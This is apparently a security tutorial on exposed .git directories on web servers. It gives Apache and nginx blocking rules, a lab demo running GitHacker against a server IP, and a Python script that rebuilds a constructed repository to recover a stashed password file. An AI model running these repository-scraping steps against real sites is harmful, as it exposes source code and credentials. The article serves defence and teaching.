Have you tried browsing to http://yoursite.com/.git/ ? If you get a 403 error, that is expected: the web server refuses to list the directory, which is a basic hardening feature. But it only hides the listing. The individual files inside .git/ are usually still downloadable, and that is extremely dangerous. In this article I will show how the .git directory is exploited.
The dangers of the .git directory
Anyone can use an automated scanning tool such as GitHacker to download your source code and read the full git history. Git stores its data in a fixed, well-documented directory layout, so file and directory names are easy to guess even without a listing: HEAD, config, index, refs/heads/<branch>, objects/<xx>/<rest of the hash>. Most projects use master or main as the main branch, so the paths under /.git/ can be guessed directly, and the tool can also brute-force branch and tag names.
If the scan succeeds, you get a folder named result on your machine (you can change the name with the option --output-folder).
Do not deploy the .git directory, or block access to it
The .git/ folder can contain a lot of information: the complete source code, committer names and e-mail addresses, and in the worst case sensitive data such as database credentials, tokens and keys.
Public access to that folder should be blocked completely. Modern CI/CD and deployment tooling makes it easy to strip directories that have no business in a production environment.
Some web hosting providers also block access to this directory for security reasons, but not all of them do, and it is not the default configuration, so double-check your own server configuration before deploying anything.
You can take the following measures to make your system more secure:
- Turn off public access to .git/ by default
- Add a rule in the web server configuration that forbids access to version-control directories, e.g. in an Apache .htaccess file
- Do not deploy such folders into public web roots at all
The server configuration or the .htaccess file should return 404 for the .git/ directory:
RedirectMatch 404 /\.git
If possible, add the rule in both places, as two layers of defence: if someone edits .htaccess and deletes the rule, the copy in the main server configuration still blocks the directory. Returning 404 rather than 403 is also preferable, because a 403 confirms to a scanner that the path exists. Be aware that enabling .htaccess processing (AllowOverride) has a performance cost in Apache, since the server has to look for the file in every directory on each request.
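For the nginx server used in the demo below, the equivalent of the Apache rule is the following location block. It is an added example, not configuration from the original article; it assumes a single server block and that nothing legitimate under the web root starts with .git.

```nginx
server {
    # your existing listen / server_name / root directives go here

    # Match /.git itself and anything below it (HEAD, config, refs/..., objects/...),
    # but not e.g. /.github. Return 404 rather than 403 so a scanner gets no
    # confirmation that the directory exists.
    location ~ /\.git(/|$) {
        return 404;
    }
}
```

After reloading nginx, verify with curl -sI http://yoursite.com/.git/HEAD: it should return 404. A 200 means the files are still reachable regardless of what the directory itself returns.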
Demo: how to exploit the .git directory
I created two virtual machines, Ubuntu (server) and Kali (attacker). On the server I use nginx as the web server, create a file index.php and make a first commit to git.
Then I create a file conn.php containing a password as the sensitive data, add it to git, and stash that change, so the secret is not in any commit on the branch but still sits in the object store, reachable through refs/stash.
Browsing to the /.git/ path is blocked with a 403, because nginx has no index file to serve there and directory listing (autoindex) is off by default. Individual files such as /.git/HEAD are still served.
That is the basic setup on the server. Now we exploit the bug.
On Kali, run the following command to install GitHacker:
python3 -m pip install -i https://pypi.org/simple/ GitHacker
As you can see in the image below, GitHacker is installed under /home/user/.local/bin.
Change into that directory (or add it to your PATH) and run the command below, replacing IP-SERVER with the IP address of your server.
python3 githacker --url http://IP-SERVER/.git/ --output-folder result
Go to the result folder and you will find the server's repository with its commit.
Check the log and the stash list.
Restore the saved stash and the conn.php file appears in the working tree.
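The steps above (look at the log, list the stash, restore it) are what the result folder lets you do with the normal git CLI. To show what the tool actually reconstructs, and why Git's fixed layout makes the paths guessable as noted earlier, here is an added example that is not part of the original article or of GitHacker. It builds a tiny constructed repository with the Python standard library only (index.php committed on main, conn.php held only in a stash commit, all data invented here), then reads it back the way a scraper would: HEAD to refs/heads/main to commit to tree to blob, and refs/stash to the stashed tree. The file names, the password and the helper names are assumptions for illustration.

```python
import hashlib
import os
import tempfile
import zlib


def _write_object(gitdir, kind, payload):
    """Store payload as a loose object: '<kind> <size>\\0<payload>', zlib-compressed."""
    raw = f"{kind} {len(payload)}\0".encode() + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha


def _tree_entry(mode, name, sha):
    """One tree entry: '<mode> <name>\\0' followed by the 20 raw sha1 bytes."""
    return f"{mode} {name}\0".encode() + bytes.fromhex(sha)


def _write_ref(gitdir, ref, value):
    path = os.path.join(gitdir, ref)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(value + "\n")


def build_demo_repo(gitdir):
    """Constructed repository mirroring the article's setup (invented data):
    index.php is committed on main; conn.php exists only in a stash commit."""
    author = "Dev <dev@example.com> 1700000000 +0000"
    index_blob = _write_object(gitdir, "blob", b"<?php echo 'hello'; ?>\n")
    tree1 = _write_object(gitdir, "tree", _tree_entry("100644", "index.php", index_blob))
    commit1 = _write_object(
        gitdir, "commit",
        f"tree {tree1}\nauthor {author}\ncommitter {author}\n\nfirst commit\n".encode())
    conn_blob = _write_object(gitdir, "blob", b"<?php $db_password = 'S3cr3t!'; ?>\n")
    # tree entries are sorted by name; "conn.php" sorts before "index.php"
    tree2 = _write_object(
        gitdir, "tree",
        _tree_entry("100644", "conn.php", conn_blob) + _tree_entry("100644", "index.php", index_blob))
    # a real stash commit also has a second parent for the index; one parent is enough here
    stash = _write_object(
        gitdir, "commit",
        f"tree {tree2}\nparent {commit1}\nauthor {author}\ncommitter {author}\n\nWIP on main\n".encode())
    _write_ref(gitdir, "HEAD", "ref: refs/heads/main")
    _write_ref(gitdir, "refs/heads/main", commit1)
    _write_ref(gitdir, "refs/stash", stash)


# --- attacker side: the same guessable paths a scraper fetches one by one over HTTP ---

def read_object(gitdir, sha):
    """Inflate objects/<xx>/<38 hex> and split '<kind> <size>\\0' from the payload."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, payload = raw.split(b"\0", 1)
    return header.decode().split(" ")[0], payload


def resolve_ref(gitdir, ref):
    """Follow 'ref: refs/heads/main' style indirections until a sha1 is reached."""
    with open(os.path.join(gitdir, ref)) as fh:
        value = fh.read().strip()
    return resolve_ref(gitdir, value[5:]) if value.startswith("ref: ") else value


def parse_tree(payload):
    """Yield (mode, name, sha) for every entry of a tree object."""
    pos = 0
    while pos < len(payload):
        nul = payload.index(b"\0", pos)
        mode, name = payload[pos:nul].decode().split(" ", 1)
        yield mode, name, payload[nul + 1:nul + 21].hex()
        pos = nul + 21


def files_at(gitdir, ref):
    """Return {name: content} for the (flat) tree of the commit a ref points to."""
    kind, commit = read_object(gitdir, resolve_ref(gitdir, ref))
    assert kind == "commit", kind
    tree_sha = commit.split(b"\n", 1)[0].decode().split(" ", 1)[1]  # first line: "tree <sha>"
    _kind, tree = read_object(gitdir, tree_sha)
    return {name: read_object(gitdir, sha)[1]
            for mode, name, sha in parse_tree(tree) if mode != "40000"}


def demo():
    """Build the constructed .git directory and recover files from HEAD and the stash."""
    gitdir = tempfile.mkdtemp(suffix=".git")
    build_demo_repo(gitdir)
    return files_at(gitdir, "HEAD"), files_at(gitdir, "refs/stash")


if __name__ == "__main__":
    head_files, stash_files = demo()
    print("on HEAD:  ", sorted(head_files))   # ['index.php']
    print("in stash: ", sorted(stash_files))  # ['conn.php', 'index.php']
    print(stash_files["conn.php"].decode(), end="")
```

Against a real target the same paths are fetched over HTTP (/.git/HEAD, /.git/refs/heads/main, /.git/refs/stash, /.git/objects/xx/...) and parsed identically. What the example leaves out is packed storage (/.git/packed-refs and /.git/objects/pack/*.pack), which is the usual complication and one reason to use a tool like GitHacker. With a downloaded repository the same recovery with the git CLI is git log, git stash list and git stash apply (or git checkout stash@{0} -- conn.php).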
So the exploitation succeeded. Do not pull the repository directly onto production for convenience; always remove the .git directory when you deploy.